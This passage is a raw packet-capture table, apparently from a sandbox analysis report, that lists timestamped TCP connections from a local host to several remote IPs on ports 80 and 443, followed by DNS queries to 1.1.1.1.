Dec 15, 2024 09:23:25.896308899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.896373034 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.898224115 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.898237944 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.898299932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.898299932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.900010109 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.900079012 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.900104046 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.900193930 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.901837111 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.901926041 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.901964903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.901964903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.903856993 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.903912067 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.903914928 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.903973103 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.905538082 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.905612946 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.905642033 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.905682087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.907356024 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.907447100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.907524109 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.907589912 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.909184933 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.909265995 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.909293890 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.909365892 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.910898924 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.910947084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.911072969 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.911151886 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.912559986 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.912638903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.912638903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.912695885 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.914248943 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.914331913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.914422035 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.914462090 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.915950060 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.916018963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.916054964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.916235924 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.917742014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.917787075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.917861938 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.917905092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.919332027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.919397116 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.919426918 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.919473886 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.920999050 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.921086073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.921108961 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.921256065 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.922688007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.922761917 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.922799110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.922846079 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.924367905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.924460888 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.924484015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.924527884 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.926084995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.926193953 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.926203012 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.926256895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.927798986 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.927855968 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.927926064 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.927972078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.929508924 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.929600000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.929644108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.929644108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.931122065 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.931190968 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.931200981 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.931272984 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.932853937 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.932980061 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.932986975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.933033943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.934526920 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.934583902 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.934649944 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.934742928 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.936286926 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.936345100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.936395884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.936439037 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.937865019 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.937939882 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.937961102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.938009977 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.939557076 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.939609051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.939650059 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.939702034 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.941241980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.941268921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:25.941287041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:25.941334963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.040824890 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.040867090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.040905952 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.040905952 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.041354895 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.041439056 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.041459084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.041661978 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.042587042 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.042701006 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.042738914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.042738914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.043817043 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.043932915 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.043946981 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.043981075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.045067072 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.045123100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.045156002 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.045300007 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.046286106 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.046353102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.046374083 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.046459913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.047472000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.047533035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.047561884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.047604084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.048615932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.048734903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.048758030 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.048810959 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.049834013 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.049974918 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.050666094 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.050709963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.051090956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.051136017 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.051234007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.051284075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.052171946 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.052253008 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.052339077 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.052573919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.053273916 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.053380013 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.053411961 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.053474903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.054415941 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.054460049 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.054539919 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.054822922 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.055560112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.055598974 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.055638075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.055690050 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.056662083 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.056745052 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.056778908 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.056835890 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.057776928 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.057818890 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.057894945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.057936907 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.058936119 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.058978081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.059025049 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.059062958 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.060054064 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.060141087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.060178995 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.060178995 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.061110973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.061220884 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.061239004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.061333895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.062206030 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.062268019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.062344074 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.062390089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.063291073 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.063338041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.063420057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.063560963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.064338923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.064428091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.064435005 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.064630032 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.065390110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.065454006 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.065469027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.065511942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.066489935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.066530943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.066580057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.066618919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.067572117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.067665100 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.067704916 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.067704916 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.068650007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.068691969 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.068850994 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.069017887 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.069736004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.069814920 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.069842100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.069917917 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.070756912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.070879936 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.070919991 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.070919991 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.071827888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.071934938 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.072016001 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.072212934 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.072988987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.073024988 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.074004889 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.074048042 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.074148893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.074160099 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.074203014 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.075063944 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.075110912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.075140953 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.075140953 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.076116085 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.076165915 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.076242924 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.076318979 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:26.077177048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:26.077236891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:30.233691931 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:30.233741999 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:30.233825922 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:30.235214949 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:30.235224962 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:30.450059891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 15, 2024 09:23:30.450231075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:23:31.466586113 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:31.466849089 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:31.572213888 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:31.572266102 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:31.572627068 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:31.678873062 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:31.841519117 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:31.841567993 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:31.841701031 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:33.667762995 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:33.667849064 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:33.667905092 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:33.669943094 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:33.669965029 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:33.670129061 CET	49732	443	192.168.2.4	104.21.22.222
Dec 15, 2024 09:23:33.670134068 CET	443	49732	104.21.22.222	192.168.2.4
Dec 15, 2024 09:23:33.818881989 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:33.818936110 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:33.819039106 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:33.819535017 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:33.819550991 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:35.048379898 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:35.048477888 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:35.050328016 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:35.050340891 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:35.050599098 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:35.052737951 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:35.052902937 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:35.052937984 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:36.579161882 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:36.579406023 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:36.579498053 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:36.583858013 CET	49733	443	192.168.2.4	104.21.16.1
Dec 15, 2024 09:23:36.583906889 CET	443	49733	104.21.16.1	192.168.2.4
Dec 15, 2024 09:23:37.694490910 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:37.694541931 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:37.697680950 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:37.698136091 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:37.698147058 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.091325045 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.091432095 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:39.093420029 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:39.093427896 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.093820095 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.095259905 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:39.135344028 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.854078054 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.854110003 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.854125977 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.854374886 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:39.854408979 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:39.854466915 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.034470081 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.034533978 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.034632921 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.034651995 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.034706116 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.064603090 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.064667940 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.064699888 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.064712048 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.064768076 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.064896107 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.064914942 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:23:40.064940929 CET	49736	443	192.168.2.4	23.55.153.106
Dec 15, 2024 09:23:40.064949036 CET	443	49736	23.55.153.106	192.168.2.4
Dec 15, 2024 09:25:11.241867065 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:25:11.585226059 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:25:12.272742987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:25:13.632817030 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:25:16.319637060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:25:21.710424900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 15, 2024 09:25:32.475908041 CET	49731	80	192.168.2.4	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 09:23:21.267877102 CET	53551	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:21.408256054 CET	53	53551	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:29.942881107 CET	56160	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:30.080929995 CET	53	56160	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:30.089118004 CET	53059	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:30.227077007 CET	53	53059	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:33.671988964 CET	64826	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:33.809834957 CET	53	64826	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:36.608311892 CET	57451	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:36.746326923 CET	53	57451	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:36.750710964 CET	58921	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:36.888850927 CET	53	58921	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:36.892587900 CET	53885	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:37.033804893 CET	53	53885	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:37.040754080 CET	51917	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:37.178563118 CET	53	51917	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:37.183845997 CET	61751	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:37.322361946 CET	53	61751	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:37.326266050 CET	50660	53	192.168.2.4	1.1.1.1
Dec 15, 2024 09:23:37.463306904 CET	53	50660	1.1.1.1	192.168.2.4
Dec 15, 2024 09:23:37.470479012 CET	65092	53	192.168.2.4	1.1.1.1
